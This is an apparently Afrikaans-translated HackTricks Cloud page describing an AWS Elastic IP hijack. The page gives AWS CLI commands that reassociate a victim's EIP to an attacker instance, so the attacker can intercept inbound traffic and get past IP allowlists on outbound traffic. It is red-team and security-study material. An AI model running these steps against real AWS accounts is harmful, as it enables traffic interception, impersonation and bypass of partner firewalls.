AWS - Elastic IP Hijack for Ingress/Egress IP Impersonation
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Opsomming
Misbruik ec2:AssociateAddress (en opsioneel ec2:DisassociateAddress) om ’n Elastic IP (EIP) van ’n slagoffer-instansie/ENI na ’n aanvaller-instansie/ENI te herassosieer. Dit herlei inkomende verkeer wat na die EIP gaan na die aanvaller en laat die aanvaller ook uitgaande verkeer met die allowlisted publieke IP uitgaan om eksterne vennoot-firewalls te omseil.
Vereistes
- Teiken EIP allocation ID in dieselfde rekening/VPC.
- Aanvaller-instansie/ENI wat jy beheer.
- Permissies:
ec2:DescribeAddressesec2:AssociateAddressop die EIP allocation-id en op die aanvaller-instansie/ENIec2:DisassociateAddress(opsioneel). Let wel:--allow-reassociationsal outomaties van die vorige aansluiting afdissocieer.
Aanval
Variables
REGION=us-east-1
ATTACKER_INSTANCE=<i-attacker>
VICTIM_INSTANCE=<i-victim>
- Ken die slagoffer se EIP toe of identifiseer dit (lab ken ’n nuwe een toe en heg dit aan die slagoffer)
ALLOC_ID=$(aws ec2 allocate-address --domain vpc --region $REGION --query AllocationId --output text)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $VICTIM_INSTANCE --region $REGION
EIP=$(aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION --query Addresses[0].PublicIp --output text)
- Verifieer dat die EIP tans na die geteikende diens oplos (voorbeeld: kontroleer vir ’n banner)
curl -sS http://$EIP | grep -i victim
- Herassosieer die EIP aan die attacker (word outomaties van die victim losgekoppel)
aws ec2 associate-address --allocation-id $ALLOC_ID --instance-id $ATTACKER_INSTANCE --allow-reassociation --region $REGION
- Verifieer dat die EIP nou na die attacker service oplos.
sleep 5; curl -sS http://$EIP | grep -i attacker
Bewys (verplaasde assosiasie):
aws ec2 describe-addresses --allocation-ids $ALLOC_ID --region $REGION \
--query Addresses[0].AssociationId --output text
Impact
- Inbound impersonation: Alle verkeer na die hijacked EIP word na die attacker instance/ENI afgelewer.
- Outbound impersonation: Attacker kan verkeer inisieer wat blyk te kom van die allowlisted public IP (bruikbaar om partner/eksterne bron IP-filters te omseil).
Tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
HackTricks Cloud

